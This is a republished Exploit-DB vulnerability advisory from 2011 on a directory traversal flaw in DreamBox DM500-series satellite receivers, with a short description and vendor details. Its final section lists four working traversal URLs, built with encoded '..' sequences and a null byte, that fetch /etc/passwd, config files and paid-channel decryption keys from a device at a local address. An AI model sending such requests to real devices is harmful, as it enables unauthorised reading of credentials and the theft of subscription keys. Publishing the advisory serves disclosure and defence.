DreamBox DM500(+) – Arbitrary File Download

  • 作者: LiquidWorm
    日期: 2011-05-13
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/17279/
  •  DreamBox DM500(+) Arbitrary File Download Vulnerability
    
    
     Vendor: Dream Multimedia GmbH
     Product web page: http://www.dream-multimedia-tv.de
     Affected version: DM500, DM500+, DM500HD and DM500S
    
     Summary: The Dreambox is a series of Linux-powered
     DVB satellite, terrestrial and cable digital television
     receivers (set-top box).
    
     Desc: Dreambox suffers from a file download vulnerability
     thru directory traversal with appending the '/' character
     in the HTTP GET method of the affected host address. The
     attacker can get to sensitive information like paid channel
     keys, usernames, passwords, config and plug-ins info, etc.
    
     Tested on: Linux Kernel 2.6.9, The Gemini Project, Enigma
    
    
     Vulnerability discovered by: Gjoko 'LiquidWorm' Krstic
     liquidworm gmail com
     Zero Science Lab - http://www.zeroscience.mk
    
    
     Advisory ID: ZSL-2011-5013
     Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5013.php
    
    
     22.12.2010
    
    
     --------------------------------------------------------------------
    
     http://192.168.1.102/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd%00
     http://192.168.1.102/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../Autoupdate.key%00
     http://192.168.1.102/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../camd3.config%00
     http://192.168.1.102/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../var/keys/camd3.keys%00